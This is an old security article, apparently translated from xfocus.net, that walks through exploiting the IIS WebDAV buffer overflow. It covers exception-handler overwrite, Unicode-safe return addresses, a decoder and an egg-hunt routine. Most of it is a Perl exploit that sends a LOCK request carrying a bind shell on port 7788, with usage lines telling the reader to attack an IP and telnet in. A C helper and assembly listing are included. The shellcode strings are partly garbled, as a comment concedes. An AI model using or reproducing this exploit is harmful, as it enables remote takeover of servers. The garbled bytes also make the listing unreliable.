A general method for exploiting the WebDAV vulnerability
Created: 2003-03-29
Article attribute: original
Article source: http://www.xfocus.net
Submitted by: ISNO (isno_at_sina.com)
By ISNO
After I posted the analysis and the overflow program the other day, some readers questioned the success rate of the exploit. Fair enough: that program was not good, and its success rate was fairly low. Over the past two days I dug out the old article "Widechar string buffer overflow attack technology" and found that the WebDAV vulnerability can also use a JMP EBX address (the script below uses a CALL EBX, which works the same way) as the return address. I wrote another exploit using this method, and the success rate has gone up.
First, we overwrite an exception-handler pointer with an address that survives the Unicode conversion. When the handler is invoked, execution comes back to the four bytes in front of that address (EBX points at the exception registration record, which is why a JMP EBX or CALL EBX works). In front of the address we place the two one-byte instructions 0x51 (PUSH ECX) and 0x59 (POP ECX), which execute harmlessly; in the exploit's $RET string they are followed by 0x58 (POP EAX) and 0x68 (PUSH imm32), so the four address bytes are consumed as the immediate of the PUSH and are never executed. Behind that we place a decoder, which decodes the printable characters that follow it in place. The decoded code is a search routine: it searches memory for the real shellcode and then jumps to it.
The method is described in detail in Yuan Ge's article:
http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
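As an added example (not code from the article or from ISNO's script), the following C program builds one unit of the $RET string from a return address the way the script does, and then decodes the %uXXXX tokens into the bytes that IIS stores in its wide-character buffer (one UTF-16 code unit per token, low byte first), so the instruction sequence that actually lands in front of the handler pointer can be inspected. The address 0x695c6772 is the one quoted in the script; the function names and the check that neither 16-bit half is 0x0000 (a NUL code unit would end the wide string) are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>

/* One unit of $RET decodes to  51 59 58 68 <addr>  =
 *   PUSH ECX / POP ECX / POP EAX / PUSH imm32
 * Landing on any of the first four bytes executes harmlessly, and the PUSH
 * imm32 swallows the four address bytes so they are never executed. */
#define RET_UNIT_CHARS 24           /* four "%uXXXX" tokens */
#define RET_UNIT_BYTES 8

/* Encode addr as "%u5951%u6858%u<low16>%u<high16>", as the script does.
 * Returns 0 on success, -1 if the buffer is too small or either 16-bit half
 * is 0x0000 (assumption: a NUL code unit would terminate the wide string). */
int build_ret_unit(uint32_t addr, char *out, size_t cap) {
    unsigned lo = addr & 0xffffu, hi = addr >> 16;
    if (cap < RET_UNIT_CHARS + 1 || lo == 0 || hi == 0) return -1;
    snprintf(out, cap, "%%u5951%%u6858%%u%04x%%u%04x", lo, hi);
    return 0;
}

/* Decode a run of %uXXXX tokens into the bytes the wide-char buffer holds:
 * each token is one UTF-16 code unit, stored low byte first.
 * Returns the byte count, or -1 on a malformed token or a full buffer. */
int decode_percent_u(const char *s, uint8_t *out, size_t cap) {
    size_t n = 0;
    while (*s) {
        char hex[5] = {0};
        if (s[0] != '%' || s[1] != 'u') return -1;
        for (int i = 0; i < 4; i++) {
            if (!isxdigit((unsigned char)s[2 + i])) return -1;
            hex[i] = s[2 + i];
        }
        unsigned unit = (unsigned)strtoul(hex, NULL, 16);
        if (n + 2 > cap) return -1;
        out[n++] = (uint8_t)(unit & 0xff);
        out[n++] = (uint8_t)(unit >> 8);
        s += 6;
    }
    return (int)n;
}

/* Check a decoded unit: instruction prefix in place, and bytes 4..7 (the slot
 * that overwrites the handler pointer) holding addr little-endian. */
int ret_unit_is_wellformed(const uint8_t *b, int n, uint32_t addr) {
    static const uint8_t prefix[4] = { 0x51, 0x59, 0x58, 0x68 };
    uint32_t slot;
    if (n != RET_UNIT_BYTES || memcmp(b, prefix, 4) != 0) return 0;
    slot = (uint32_t)b[4] | (uint32_t)b[5] << 8 | (uint32_t)b[6] << 16 | (uint32_t)b[7] << 24;
    return slot == addr;
}

int main(void) {
    char enc[RET_UNIT_CHARS + 1];
    uint8_t raw[RET_UNIT_BYTES];
    if (build_ret_unit(0x695c6772, enc, sizeof enc) != 0) return 1;
    int n = decode_percent_u(enc, raw, sizeof raw);
    printf("%s ->", enc);
    for (int i = 0; i < n; i++) printf(" %02x", raw[i]);
    printf("  (well-formed: %s)\n", ret_unit_is_wellformed(raw, n, 0x695c6772) ? "yes" : "no");
    return 0;
}
```

The script repeats this unit eight times, so whichever unit boundary the overwritten handler pointer ends up on, the bytes before it are the harmless prefix and the bytes after it are the immediate of a PUSH.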
The search code that locates the shellcode is as follows:
    add esi, 1000h
    jmp loadmem
lookupn:
    add esi, 4000h
loadmem:
    mov eax, [esi]
    cmp eax, 4E4E4E4Eh      ; look for memory containing "NNNN" first; this speeds up the search
    jnz lookupn
    add esi, 4
lookupyxyx:
    mov al, byte ptr [esi]
    inc esi
    cmp al, 59h             ; then look for "YXYX", which we place right in front of the shellcode
    jnz lookupyxyx
    mov al, byte ptr [esi]
    inc esi
    cmp al, 58h
    jnz lookupyxyx
    lodsw
    cmp ax, 5859h
    jnz lookupyxyx
    jmp esi                 ; found it: jump to the shellcode and execute it
Of course, you must first install an exception handler, so that when the search touches a page that does not exist, control comes back to our own code and the search can continue.
The modified exploit is as follows:
-------------------------------------------------- -----------------
#!/usr/bin/perl
# use CALL EBX as the ret
# tested on Chinese Win2k SP2 & SP3
# by isno@xfocus.org
use IO::Socket;

if ($#ARGV < 1) { die "webdavx.pl ip offset\r\noffset: 0-7\r\n"; }
$host   = $ARGV[0];
$port   = 80;
$offset = $ARGV[1];

# decoder code (66 bytes), sent %u-encoded so every byte survives the Unicode
# conversion: it scans forward from EBX for the %u6099 marker and decodes the
# printable search code that follows it in place
$decode =
"%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f".
"%u66ad%u4e3d%u7400%u9023%u612c%u9090%u6659%u90ad".
"%u612c%u548d%u7088%u548d%u908a%u548d%u708a%u548d".
"%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3".
"%u6099";

# code to find the real shellcode (340 bytes, printable-encoded, decoded by
# $decode above). NOTE: this string and the $shell payload below are partly
# garbled in the copy of the listing reproduced here; tokens that could not be
# read are left as they appear, so the script will not work as printed.
$sc =
"ffilomidomfafd".
"fgfhnlaljbeaaaaaaalimmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm".
"geijdnaaaaaaaamhefpepppppppppilefpaidoiahijefpiloaaaabaaaoideaaaaaaaaaarap".
"agibmgaaeaaaailagdneoeoeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihf".
"okppogolpofifailhnpaijehpcmdileeceamafliaaaaaaamhaaeeddccbbddmamdolomoihihppppppce".
"cecece";

$num = 266 + $offset;                   # distance to the overwritten handler pointer
$bf  = "a" x $num;
$ret = "%u5951%u6858%u6772%u695c" x 8;  # call ebx addr 0x695c6772
$n   = 64842;
$buf = "N" x $n;                        # the "NNNN" run the search code looks for
$tag = "YXYX";                          # marks the start of the real shellcode
# bind shell on port 7788, XOR-0x97 encoded
$shell =
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90".
"\x90\x03\x50\x80\x30\x97\x40/ x - x30\xfa".
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36".
"\x97\x97\x97\x97\xc7\x97\x97\x97\x97\x4c\x2c\x97".
"\x97\x16\x6c\x97\x16\x6c\x97\x97\x68\x28\x98\x14".
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2".
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xd2/ x-xaf\xc7\xd2\xe2\x4e\x14".
"\x57\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5".
"\xd9\xe2\x52\x16\xee\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1".
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16".
"\xee\x93\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68".
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1".
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94".
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4".
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68".
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57".
"\x3b\x13\x57/ xee2\x6e/ x5\x5e/ x1\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4".
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4".
"\x57\x3b\x13\x57\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5".
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68".
"\xc0\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67".
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1".
"\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf".
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab".
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0".
"\xbb\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4".
"\x57\xc7\x68\xc0\x5f\x68\xc0\x5b\x68\xc1\x6b\x68\xc0".
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56".
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\x57\x1c\x5f\x22\x93\xc7\xc7".
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57".
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4".
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f".
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xa4\x5e\xc6\xc7".
"\xc1\x68\xc0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68".
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f".
"\x97\x97\x97\x50\x97\x75".
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70/ x - xb4\x17\x70\xe0".
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5".
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2".
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6".
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97".
"\xd4\xdf\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc".
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb".
"\xd6\xfb\xfb\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97".
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2".
"\xef\xfe\xe3\xc7\xe5\xe4\x97\x97\xc0\xc4\xd8\xd4".
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97".
"\xfb\xfe\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2".
"\x97\x95\x97\x89\x95\x97\x89\x97\x97\x97\x97".
"\x97\x97\x97\x97\x97\x97\xfa\xf3\xb9\xf2\xef\xf2\x97".
"\x68\x68\x68\x68";

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
                                Proto => "tcp", Type => SOCK_STREAM)
    or die "couldn't: $!\n";
# the overflow travels in the LOCK request URI; the real shellcode travels in the body
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1\r\n";
print $socket "Host: $host\r\n";
print $socket "Content-Type: text/xml\r\n";
print $socket "Content-Length: 808\r\n\r\n";
print $socket "$tag$shell\r\n";
print "send buffer...\r\n";
print "telnet target 7788\r\n";
print "if fail, try other offset (0-7)\r\n";
#$socket->recv($buf, 500);
#print $buf;
close($socket);
-------------------------------------------------- -----------------
Usage:
webdavx2.pl 192.168.0.1 0
Then telnet to 192.168.0.1 7788 and see whether you get a shell.
The offset argument exists because the path that gets built is not always the same: on some targets it is \\?\C:\inetpub\gtmis0\asp\, on others \\?\C:\inetpub\wwwroot\, i.e. it depends on the web root directory, so the distance to the overwritten pointer varies. Try 0 through 7 first; if none of those works, try -1, -2, -3 and so on; if it still does not succeed, then it just does not succeed.